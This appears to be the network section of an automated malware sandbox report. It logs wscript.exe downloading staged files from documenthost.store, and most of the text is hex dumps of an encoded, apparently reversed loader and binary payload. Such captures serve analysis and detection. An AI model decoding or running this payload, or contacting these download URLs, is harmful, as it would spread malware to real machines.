                                                    2024-11-12 12:39:48 UTC1369INData Raw: 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                                                    Data Ascii: 414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414
                                                    2024-11-12 12:39:48 UTC1369INData Raw: 39 34 44 36 41 36 34 37 35 33 30 33 32 36 33 36 38 37 30 35 34 36 32 37 36 34 45 35 37 34 43 33 30 35 41 33 32 36 32 37 41 33 39 36 44 36 33 36 41 36 43 35 37 36 32 37 34 34 44 35 38 35 39 37 34 35 36 34 37 36 31 36 41 34 45 36 45 34 46 37 35 34 41 35 38 36 34 36 39 33 30 37 41 36 33 37 35 37 38 35 37 36 32 33 34 34 32 37 39 36 33 36 43 36 34 35 37 35 41 37 33 36 43 36 44 36 34 37 30 34 41 34 38 35 35 36 42 35 36 34 37 36 34 37 41 35 36 35 37 36 34 37 38 35 36 36 44 36 33 33 38 34 31 34 33 34 39 36 37 34 31 34 33 34 39 36 37 36 46 35 31 34 34 32 42 36 42 34 38 36 34 37 30 34 41 35 38 36 34 36 41 35 36 33 32 36 33 33 38 34 31 34 33 34 39 36 37 34 31 36 39 34 33 34 45 33 34 36 41 34 39 37 39 35 39 36 45 34 43 37 34 34 45 35 38 35 39 33 36 33 30 33 32 36 32
                                                    Data Ascii: 94D6A647530326368705462764E574C305A32627A396D636A6C5762744D5859745647616A4E6E4F754A586469307A6375785762344279636C64575A736C6D64704A48556B5647647A56576478566D633841434967414349676F51442B6B4864704A58646A56326338414349674169434E346A4979596E4C744E585936303262
                                                    2024-11-12 12:39:48 UTC1369INData Raw: 34 32 37 37 36 32 34 31 34 39 34 38 34 31 35 31 34 32 35 31 34 31 34 31 33 34 34 31 34 31 33 38 34 31 34 31 34 31 34 31 35 35 34 37 34 31 33 34 34 32 35 31 35 41 34 31 33 34 34 33 34 31 33 30 34 31 36 37 34 44 34 31 34 31 34 34 34 31 37 39 34 31 34 31 34 44 34 31 34 35 34 34 34 31 37 39 34 31 34 31 34 44 34 31 35 31 34 37 34 31 37 33 34 32 35 31 36 31 34 31 35 35 34 38 34 31 34 33 34 32 34 31 34 31 34 31 35 35 34 37 34 31 37 34 34 32 35 31 35 39 34 31 33 34 34 37 34 31 36 43 34 32 34 31 36 32 34 31 36 42 34 37 34 31 34 37 34 32 34 31 36 32 34 31 34 35 34 37 34 31 37 35 34 32 35 31 36 31 34 31 36 33 34 37 34 31 37 30 34 32 36 37 36 33 34 31 33 38 34 35 34 31 34 32 34 31 36 37 34 35 34 31 37 37 34 35 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34
                                                    Data Ascii: 42776241494841514251414134414138414141415547413442515A413443413041674D414144417941414D414544417941414D415147417342516141554841434241414155474174425159413447416C424162416B4741474241624145474175425161416347417042676341384541424167454177454141414141414141414
                                                    2024-11-12 12:39:48 UTC1369INData Raw: 31 34 43 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 37 35 34 32 37 37 36 32 34 31 36 42 34 37 34 31 33 30 34 32 35 31 35 39 34 31 37 37 34 37 34 31 37 41 34 32 36 37 36 32 34 31 34 35 34 37 34 31 37 39 34 32 34 31 35 36 34 31 34 31 34 31 34 31 34 35 34 31 34 31 34 41 34 31 34 31 34 31 34 31 34 31 34 31 37 37 36 32 34 31 35 39 34 37 34 31 37 35 34 32 35 31 35 33 34 31 35 35 34 37 34 31 37 33 34 32 35 31 36 31 34 31 35 39 34 35 34 31 37 39 34 32 35 31 35 39 34 31 35 39 34 36 34 31 34 32 34 31 34 31 34 31 34 31 35 31 34 35 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 35 31 34 31 34 31 34 31 34 31 34 31 34 35 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 37 37 35 30 34 31
                                                    Data Ascii: 14C41414141414141414175427762416B474130425159417747417A4267624145474179424156414141414541414A414141414141776241594741754251534155474173425161415945417942515941594641424141414151454141414141414141414141414141414141414151414141414145414141414141414141775041
                                                    2024-11-12 12:39:48 UTC1369INData Raw: 34 35 35 38 33 30 34 39 34 34 34 44 37 39 34 31 35 34 34 44 37 39 34 31 34 34 35 41 37 33 36 43 35 37 36 34 34 33 37 38 34 36 36 33 37 36 35 32 33 33 36 31 37 41 35 36 34 37 35 32 36 33 33 35 35 37 36 31 37 34 35 32 35 37 35 39 36 33 34 45 36 45 36 33 36 43 34 45 35 38 35 36 36 33 37 30 37 41 35 31 34 31 34 31 34 31 34 31 34 32 34 39 34 38 35 39 36 46 35 32 36 45 35 30 33 35 36 32 37 32 36 39 34 38 35 32 35 37 36 37 34 38 34 34 36 46 37 36 34 31 34 31 37 37 35 35 34 35 34 45 36 43 35 35 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 35 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 34 31 36 35 34 31 35 30 34 31 34 31 37
                                                    Data Ascii: 45583049444D7941544D7941445A736C576443784663765233617A5647526335576174525759634E6E636C4E585663707A5141414141424948596F526E50356272694852576748446F7641417755454E6C554141414141414141414141414141414141414141514141414141414141414141414141414141414165415041417
                                                    2024-11-12 12:39:48 UTC1369INData Raw: 37 35 41 34 38 35 36 34 37 36 32 37 30 35 41 35 35 35 41 37 33 36 34 36 44 36 32 37 30 34 45 33 31 36 33 36 45 33 35 35 37 36 31 33 30 35 32 35 38 35 41 35 34 33 35 36 39 36 33 36 43 33 35 33 32 35 41 37 30 34 45 35 38 35 41 34 35 34 45 33 33 35 41 37 35 36 43 34 37 36 34 33 30 35 36 33 32 35 35 37 35 34 44 36 45 36 33 37 36 35 32 35 38 36 31 36 42 35 36 36 42 34 43 37 36 36 43 34 37 35 41 33 31 35 32 33 33 35 35 37 33 34 36 35 37 36 34 37 41 36 43 36 44 35 36 37 35 35 31 36 45 35 41 37 36 34 45 33 33 36 32 37 39 34 45 35 37 36 31 34 45 37 34 34 35 34 31 34 32 36 42 34 36 34 31 34 31 34 31 36 41 34 43 37 37 33 34 34 33 34 44 37 35 36 33 35 34 34 44 34 39 34 39 35 38 35 41 36 42 37 38 35 37 36 31 33 31 34 41 35 35 35 41 36 41 34 41 35 38 36 34 37 36 34 45
                                                    Data Ascii: 75A48564762705A555A73646D62704E31636E3557613052585A543569636C35325A704E585A454E335A756C476430563255754D6E63765258616B566B4C766C475A31523355734657647A6C6D5675516E5A764E3362794E57614E744541426B464141416A4C7734434D7563544D4949585A6B785761314A555A6A4A5864764E
                                                    2024-11-12 12:39:48 UTC1369INData Raw: 34 31 34 35 36 37 36 37 34 35 34 31 34 31 34 31 34 32 34 44 34 39 34 32 34 31 34 31 35 31 34 31 34 37 35 33 35 39 37 37 34 31 34 32 34 33 36 46 34 35 34 37 35 31 35 31 36 36 35 33 35 39 37 37 34 31 36 42 34 39 35 32 34 31 36 46 34 39 35 32 34 36 34 37 36 33 35 31 35 39 35 33 34 35 34 31 34 42 35 33 35 35 36 38 34 32 34 38 36 37 36 37 34 35 34 32 36 37 36 39 34 35 35 36 35 39 37 37 34 32 34 44 34 39 35 32 34 31 36 46 34 39 35 32 34 36 34 37 36 33 36 37 34 46 34 42 35 35 36 34 34 35 32 46 33 39 33 31 35 30 37 37 36 39 35 31 36 39 36 37 35 34 35 34 34 37 35 37 37 38 36 43 36 35 33 33 36 39 34 31 34 31 35 34 34 35 36 37 34 33 34 35 34 31 37 37 34 35 34 33 34 31 37 37 34 35 34 37 34 44 34 31 34 31 35 34 34 35 34 31 34 42 35 33 35 35 36 38 34 32 34 33 34 31 37
                                                    Data Ascii: 4145676745414141424D494241415141475359774142436F4547515166535977416B4952416F495246476351595345414B535568424867674542676945565977424D4952416F4952464763674F4B5564452F393150776951696754544757786C6533694141544567434541774543417745474D41415445414B5355684243417
                                                    2024-11-12 12:39:48 UTC1369INData Raw: 31 33 36 34 31 34 31 34 39 34 31 35 35 34 37 34 31 37 39 34 32 34 31 36 34 34 31 34 44 34 38 34 31 37 30 34 32 37 37 35 41 34 31 35 35 34 37 34 31 37 39 34 32 34 31 34 39 34 31 35 35 34 37 34 31 36 42 34 32 34 31 34 39 34 31 36 42 34 46 34 31 37 33 34 32 37 37 35 39 34 31 34 31 34 33 34 31 36 38 34 32 34 31 36 32 34 31 34 31 34 33 34 31 36 43 34 32 34 31 35 41 34 31 34 31 34 33 34 31 36 43 34 32 36 37 36 33 34 31 35 35 34 38 34 31 33 30 34 32 37 37 35 39 34 31 35 35 34 37 34 31 37 33 34 32 34 31 34 39 34 31 34 35 34 37 34 31 37 33 34 32 34 31 34 39 34 31 35 35 34 37 34 31 36 42 34 32 34 31 34 39 34 31 34 44 34 38 34 31 37 39 34 32 37 37 36 32 34 31 37 37 34 37 34 31 36 37 34 31 36 37 36 33 34 31 35 35 34 38 34 31 36 43 34 32 36 37 36 33 34 31 34 39 34 38
                                                    Data Ascii: 1364141494155474179424164414D48417042775A4155474179424149415547416B424149416B4F41734277594141434168424162414143416C42415A414143416C426763415548413042775941554741734241494145474173424149415547416B424149414D4841794277624177474167416763415548416C426763414948
                                                    2024-11-12 12:39:48 UTC1369INData Raw: 37 39 35 36 33 33 36 32 37 41 35 36 36 44 35 35 37 35 36 42 35 38 35 34 37 35 34 39 34 37 34 31 37 41 35 36 33 32 35 39 37 39 35 36 33 33 36 32 37 41 35 36 36 44 35 35 37 35 33 30 35 37 35 41 33 30 34 45 35 38 36 35 35 34 34 32 37 37 36 33 36 43 34 45 35 37 36 31 33 32 34 41 35 38 35 41 35 34 34 41 35 38 35 41 37 33 36 43 34 37 36 33 37 34 33 39 33 32 35 31 37 35 35 35 35 37 36 32 37 30 35 32 36 45 36 32 33 31 34 41 36 43 34 43 37 34 35 36 34 37 36 34 37 41 36 43 33 33 35 35 34 31 34 44 35 38 35 41 36 41 36 43 36 44 36 34 37 39 35 36 33 32 35 35 37 39 35 36 34 37 36 32 37 30 34 32 35 38 36 32 37 36 34 45 36 42 34 43 36 41 36 43 33 32 36 33 36 38 34 41 34 35 36 32 36 38 35 36 33 33 36 33 37 30 35 41 36 43 34 43 33 30 35 41 33 32 36 32 37 41 33 39 36 44 36
                                                    Data Ascii: 795633627A566D55756B5854754947417A563259795633627A566D557530575A304E5865544277636C4E5761324A585A544A585A736C4763743932517555576270526E62314A6C4C745647647A6C3355414D585A6A6C6D64795632557956476270425862764E6B4C6A6C3263684A456268563363705A6C4C305A32627A396D6


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    1 | 192.168.2.5 | 49705 | 172.67.215.48 | 443 | 7252 | C:\Windows\System32\wscript.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-11-12 12:39:49 UTC | 158 | OUT | GET /2910/r HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: documenthost.store
                                                    2024-11-12 12:39:49 UTC | 813 | IN | HTTP/1.1 200 OK
                                                    Date: Tue, 12 Nov 2024 12:39:49 GMT
                                                    Content-Length: 38912
                                                    Connection: close
                                                    Last-Modified: Wed, 09 Oct 2024 05:50:42 GMT
                                                    ETag: "9800-62404d5968a93"
                                                    Accept-Ranges: bytes
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BWpBswhfHBFpgb9qVl1ck9M0CuCBmHoMS0ucF8UmUWGa71n7lCzKOIku0rFzTBZOpKajaOdCjLB7pDKaRfleMFO3tMSihmETxr4OSrr5Lt3NM7SI0ffWPyTgFFSHogqMPK8EpTg%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e1696471cd0e786-DFW
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1151&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=772&delivery_rate=2470989&cwnd=239&unsent_bytes=0&cid=6c3c0bea8d1fc98b&ts=403&x=0"
                                                    2024-11-12 12:39:49 UTC1369INData Raw: 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                    Data Ascii: 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                                                    2024-11-12 12:39:49 UTC1369INData Raw: 30 31 34 30 30 31 30 30 30 38 30 30 30 38 33 30 30 30 30 30 30 30 33 30 30 45 32 30 30 30 33 30 30 45 32 30 30 30 33 30 30 45 32 30 30 31 33 30 30 30 30 30 30 45 36 30 30 46 36 30 30 39 36 30 30 33 37 30 30 32 37 30 30 35 36 30 30 36 35 30 30 34 37 30 30 33 36 30 30 35 37 30 30 34 36 30 30 46 36 30 30 32 37 30 30 30 35 30 30 31 30 30 30 38 30 30 30 34 33 30 30 30 30 30 30 34 33 30 30 32 33 30 30 30 33 30 30 31 33 30 30 39 33 30 30 30 33 30 30 34 36 30 30 43 36 30 30 39 36 30 30 35 37 30 30 32 34 30 30 30 30 30 30 30 30 30 30 35 36 30 30 44 36 30 30 31 36 30 30 45 34 30 30 34 37 30 30 33 36 30 30 35 37 30 30 34 36 30 30 46 36 30 30 32 37 30 30 30 35 30 30 31 30 30 30 43 30 30 30 38 33 30 30 30 30 30 30 43 36 30 30 43 36 30 30 34 36 30 30 45 32 30 30 34 33
                                                    Data Ascii: 0140010008000830000000300E2000300E2000300E20013000000E600F600960037002700560065004700360057004600F6002700050010008000430000004300230003001300930003004600C600960057002400000000005600D6001600E4004700360057004600F600270005001000C00083000000C600C6004600E20043
                                                    2024-11-12 12:39:49 UTC1369INData Raw: 30 30 30 30 32 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 46 33 30 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 31 30 30 30 30 30 45 46 46 45 34 30 44 42 30 30 30 30 30 30 30 30 30 30 46 34 30 30 36 34 30 30 45 34 30 30 39 34 30 30 46 35 30 30 45 34 30 30 46 34 30 30 39 34 30 30 33 35 30 30 32 35 30 30 35 34 30 30 36 35 30 30 46 35 30 30 33 35 30 30 36 35 30 30 30 30 30 30 34 33 33 30 43 32 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 33 30 43 32 30 30 30 30 30 38 38 35 30 30 30 30 30 30 38 34 30 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 33 30 30 30 30 30 30 31 30 30
                                                    Data Ascii: 0000200000004000000000000000F30000000000100000000000000010000000100000EFFE40DB0000000000F4006400E4009400F500E400F40094003500250054006500F5003500650000004330C20000000000000000000030C20000088500000084000000000010000000000000000000000000000008000003000000100
                                                    2024-11-12 12:39:49 UTC1369INData Raw: 32 39 37 44 34 42 30 30 30 31 30 30 31 30 30 30 30 33 37 35 36 33 36 39 36 36 37 32 37 35 36 33 35 32 36 35 36 37 35 45 32 39 37 44 34 45 30 30 30 31 30 33 31 30 30 30 30 32 37 35 36 33 37 35 35 45 32 39 37 44 34 37 30 30 30 31 30 43 30 30 30 30 30 45 36 46 36 39 36 34 37 31 36 33 36 39 36 43 36 30 37 30 37 31 34 45 32 39 37 44 34 45 30 30 30 31 30 33 31 30 30 30 30 32 37 35 36 34 37 35 37 30 37 44 36 46 36 33 34 45 32 39 37 44 34 42 30 30 30 31 30 30 31 30 30 30 30 30 30 46 35 46 35 35 36 33 36 45 36 31 36 34 37 33 37 45 36 39 34 46 35 46 35 35 36 33 37 46 36 30 37 33 37 39 36 34 34 33 31 46 35 46 35 35 36 33 36 45 36 31 36 34 37 33 37 45 36 39 34 46 35 46 35 35 36 34 37 31 36 35 36 32 37 33 34 32 31 43 36 46 36 33 36 46 36 34 37 46 36 32 37 30 35 34 37
                                                    Data Ascii: 297D4B000100100003756369667275635265675E297D4E0001031000027563755E297D4700010C00000E6F69647163696C6070714E297D4E000103100002756475707D6F634E297D4B0001001000000F5F55636E6164737E694F5F55637F60737964431F5F55636E6164737E694F5F556471656273421C6F636F647F6270547
                                                    2024-11-12 12:39:49 UTC1369INData Raw: 30 30 36 30 45 30 35 30 44 31 31 30 30 30 35 30 32 30 35 30 44 31 45 30 45 30 32 30 34 30 30 30 38 30 38 31 38 30 31 30 30 30 34 30 38 30 38 30 38 30 38 30 38 31 38 30 35 30 30 30 38 30 38 30 38 31 38 30 32 30 30 30 35 30 38 30 30 31 38 30 35 30 44 31 38 30 38 31 32 30 35 30 30 30 41 30 38 30 30 31 38 30 38 30 30 31 38 30 38 31 32 30 35 30 30 30 41 30 38 30 44 31 38 31 32 30 32 30 30 30 36 30 30 33 31 31 30 31 34 33 31 31 30 31 45 30 38 31 39 30 32 30 38 31 38 31 45 30 45 30 32 30 41 30 30 30 31 31 38 31 32 31 30 30 30 30 34 30 31 38 30 38 32 31 31 30 31 30 30 30 36 30 31 38 30 38 32 31 30 30 30 30 35 30 44 37 32 31 30 30 30 30 34 30 38 32 32 31 30 30 30 30 34 30 31 36 32 31 30 30 30 30 34 30 38 30 32 31 30 30 30 30 34 30 43 30 32 31 30 30 30 30 34 30 35
                                                    Data Ascii: 0060E050D11000502050D1E0E020400080818010004080808080818050008080818020005080018050D18081205000A080018080018081205000A080D18120200060031101431101E08190208181E0E020A00011812100004018082110100060180821000050D721000040822100004016210000408021000040C0210000405
                                                    2024-11-12 12:39:49 UTC1369INData Raw: 30 45 30 45 30 38 30 33 30 30 30 36 30 45 30 36 30 32 30 33 30 45 30 31 30 30 30 34 30 38 30 33 30 31 30 30 32 34 30 45 30 30 30 30 30 33 30 45 30 45 30 45 30 32 30 30 30 35 30 45 30 31 30 31 30 30 30 34 30 32 30 44 38 30 38 32 31 32 30 35 30 44 31 32 30 32 30 32 30 32 30 32 30 32 30 45 30 45 30 35 30 44 31 45 30 45 30 45 30 45 30 45 30 32 31 37 30 38 31 43 31 45 30 31 30 32 30 30 32 35 30 44 38 30 38 32 31 39 39 30 38 32 31 32 30 33 30 37 30 39 30 32 30 45 30 39 39 30 38 32 31 32 30 30 32 37 30 44 38 30 38 32 31 39 39 30 38 32 31 45 30 45 30 34 30 37 30 41 30 43 31 35 31 31 38 31 31 43 31 31 31 31 38 31 31 33 30 30 30 41 30 38 30 45 30 35 30 32 30 30 30 35 30 38 30 38 30 45 30 32 30 30 32 35 30 38 30 30 30 30 32 33 30 35 30 31 30 35 39 30 38 32 31 35 31
                                                    Data Ascii: 0E0E080300060E0602030E01000408030100240E0000030E0E0E0200050E01010004020D808212050D1202020202020E0E050D1E0E0E0E0E0217081C1E010200250D808219908212030709020E0990821200270D80821990821E0E04070A0C1511811C11118113000A080E0502000508080E020025080000230501059082151
                                                    2024-11-12 12:39:49 UTC1369INData Raw: 30 30 45 36 30 30 34 37 30 30 46 32 30 30 30 32 30 30 35 36 30 30 34 37 30 30 35 36 30 30 43 36 30 30 35 36 30 30 34 36 30 30 46 32 39 31 30 30 30 30 35 36 30 30 38 37 30 30 35 36 30 30 45 32 30 30 33 37 30 30 42 36 30 30 33 37 30 30 31 36 30 30 34 37 30 30 38 36 30 30 33 36 30 30 33 37 39 31 30 30 30 30 30 32 30 30 41 33 30 30 30 32 30 30 32 37 30 30 35 37 30 30 35 36 30 30 32 37 30 30 32 37 30 30 35 34 33 31 31 30 30 30 32 32 30 30 34 37 30 30 33 37 30 30 39 36 30 30 43 34 30 30 44 32 30 30 34 37 30 30 31 36 30 30 44 36 30 30 32 37 30 30 46 36 30 30 36 34 30 30 30 32 30 30 43 37 30 30 30 32 30 30 44 37 30 30 30 32 30 30 37 32 30 30 43 35 30 30 37 32 30 30 30 32 30 30 31 37 30 30 35 36 30 30 44 32 30 30 30 32 30 30 38 36 30 30 34 37 30 30 31 36 30 30 30
                                                    Data Ascii: 00E6004700F2000200560047005600C60056004600F2910000560087005600E2003700B60037001600470086003600379100000200A300020027005700560027002700543110002200470037009600C400D20047001600D6002700F60064000200C7000200D70002007200C5007200020017005600D20002008600470016000
                                                    2024-11-12 12:39:49 UTC1369INData Raw: 36 30 30 32 37 30 30 30 35 30 30 43 35 30 30 41 33 37 35 30 30 30 30 43 35 30 30 39 33 30 30 31 33 30 30 33 33 30 30 30 33 30 30 33 33 30 30 45 32 30 30 30 33 30 30 45 32 30 30 34 33 30 30 36 37 30 30 43 35 30 30 42 36 30 30 32 37 30 30 46 36 30 30 37 37 30 30 35 36 30 30 44 36 30 30 31 36 30 30 32 37 30 30 36 34 30 30 43 35 30 30 34 35 30 30 35 34 30 30 45 34 30 30 45 32 30 30 34 37 30 30 36 36 30 30 46 36 30 30 33 37 30 30 46 36 30 30 32 37 30 30 33 36 30 30 39 36 30 30 44 34 30 30 43 35 39 34 30 30 30 30 43 35 30 30 37 33 30 30 32 33 30 30 37 33 30 30 30 33 30 30 35 33 30 30 45 32 30 30 30 33 30 30 45 32 30 30 32 33 30 30 36 37 30 30 43 35 30 30 42 36 30 30 32 37 30 30 46 36 30 30 37 37 30 30 35 36 30 30 44 36 30 30 31 36 30 30 32 37 30 30 36 34 30 30
                                                    Data Ascii: 60027000500C500A3750000C50093001300330003003300E2000300E20043006700C500B6002700F60077005600D600160027006400C50045005400E400E20047006600F6003700F600270036009600D400C5940000C50073002300730003005300E2000300E20023006700C500B6002700F60077005600D600160027006400
                                                    2024-11-12 12:39:49 UTC1369INData Raw: 46 36 39 37 31 36 43 34 34 36 32 37 31 36 46 36 32 36 39 37 35 36 42 34 34 37 35 36 37 34 30 30 34 37 33 37 35 36 35 37 31 37 35 36 32 35 32 36 35 36 37 35 30 37 34 37 34 37 38 34 30 30 34 37 32 37 35 36 36 37 45 36 46 36 33 34 30 30 34 37 32 37 31 36 34 37 33 35 30 30 34 37 45 36 35 37 46 36 33 34 46 35 34 37 35 36 37 36 30 30 34 37 45 36 35 36 32 37 32 37 35 37 33 34 46 35 34 37 35 36 37 36 30 30 34 37 45 36 35 36 44 36 45 36 46 36 32 37 39 36 36 37 45 36 35 34 30 30 34 37 45 36 35 36 44 36 35 36 45 36 45 36 46 36 32 37 39 36 36 37 45 36 35 36 30 30 34 37 45 36 31 36 32 37 35 37 46 36 33 34 35 36 32 37 39 36 46 36 34 37 32 37 35 36 30 37 35 36 32 37 30 30 34 37 43 36 35 37 33 37 35 36 32 35 38 37 46 36 32 34 37 36 33 37 44 34 30 30 34 37 43 36 35 37 31
                                                    Data Ascii: F69716C4462716F6269756B44756740047375657175625265675074747840047275667E6F6340047271647350047E657F634F54756760047E65627275734F54756760047E656D6E6F6279667E6540047E656D656E6E6F6279667E6560047E6162757F634562796F64727560756270047C65737562587F6247637D40047C6571
                                                    2024-11-12 12:39:50 UTC1369INData Raw: 37 34 37 35 36 33 35 39 37 44 34 30 30 33 37 37 36 45 36 39 36 34 37 34 37 35 36 33 35 46 35 34 37 35 36 37 36 30 30 33 37 37 36 45 36 39 36 32 37 34 37 33 35 30 30 33 37 35 36 34 37 39 37 32 34 34 37 35 36 37 34 30 30 33 37 35 36 33 37 33 37 35 36 33 36 46 36 32 37 30 35 34 37 35 36 37 34 30 30 33 37 35 36 32 37 34 37 35 36 44 36 31 36 32 37 31 36 30 37 30 30 33 37 35 36 44 36 31 36 45 34 35 36 35 37 43 36 31 36 36 35 34 37 35 36 37 34 30 30 33 37 35 36 43 36 39 36 36 34 34 37 35 36 37 34 30 30 33 37 35 36 43 36 34 36 45 36 31 36 38 34 32 37 35 36 32 37 35 36 37 36 30 30 33 37 35 36 43 36 32 36 31 36 34 35 46 35 34 37 35 36 37 36 30 30 33 37 35 36 38 36 33 36 34 37 31 36 44 34 30 30 33 37 35 36 35 36 39 36 36 36 39 36 45 36 31 36 43 36 30 35 33 37 35 36
                                                    Data Ascii: 747563597D4003776E69647475635F5475676003776E69627473500375647972447567400375637375636F62705475674003756274756D616271607003756D616E45657C61665475674003756C69664475674003756C646E616842756275676003756C6261645F547567600375686364716D400375656966696E616C6053756


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    2 | 192.168.2.5 | 49706 | 172.67.215.48 | 443 | 7252 | C:\Windows\System32\wscript.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2024-11-12 12:39:50 UTC | 181 | OUT | GET /2910/E93ukvxugzIRTSVJZUqI.txt HTTP/1.1
                                                    Connection: Keep-Alive
                                                    Accept: */*
                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                    Host: documenthost.store
                                                    2024-11-12 12:39:51 UTC | 847 | IN | HTTP/1.1 200 OK
                                                    Date: Tue, 12 Nov 2024 12:39:51 GMT
                                                    Content-Type: text/plain
                                                    Content-Length: 480256
                                                    Connection: close
                                                    Last-Modified: Thu, 31 Oct 2024 11:02:41 GMT
                                                    ETag: "75400-625c3c1d5c3c2"
                                                    Accept-Ranges: bytes
                                                    cf-cache-status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pGCd1aDHdvYAbVl%2FlUJVnSwQDoJCgjxPoW1sAkP4obYo0bhv1Qenj1wJtQPxVnjvnVteCdn6Yyh%2FtDqGR1qThn1GSuO7lC2fgb1I9ZH%2F5Tk63aSTpiNPZWV0Tzo%2FAr9RUgUvXps%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 8e16964f9ca8e7e7-DFW
                                                    alt-svc: h3=":443"; ma=86400
                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1350&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=795&delivery_rate=2080459&cwnd=251&unsent_bytes=0&cid=965ae457a2686eb2&ts=414&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49709 | 172.67.215.48 | 443 | 7252 | C:\Windows\System32\wscript.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-12 12:40:04 UTC | 158 | OUT | GET /2910/v HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    Host: documenthost.store
2024-11-12 12:40:05 UTC | 821 | IN | HTTP/1.1 200 OK
    Date: Tue, 12 Nov 2024 12:40:04 GMT
    Content-Length: 478
    Connection: close
    Last-Modified: Wed, 25 Sep 2024 15:44:42 GMT
    ETag: "1de-622f3802a248c"
    Accept-Ranges: bytes
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fveBKXhfrOdlFl1ytTftv5hYfgGS%2Fr%2B%2Bi%2F0YD4LFiGdEH2cHvgUaLafuOFNb4LRP%2FwpARcN55%2FjQ8hNVAsLquZj3x9Ib9RvoNoUCabrht34on7%2Btg5StwApp1AWjparNmjXsx8k%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e1696a558ffb798-DFW
    alt-svc: h3=":443"; ma=86400
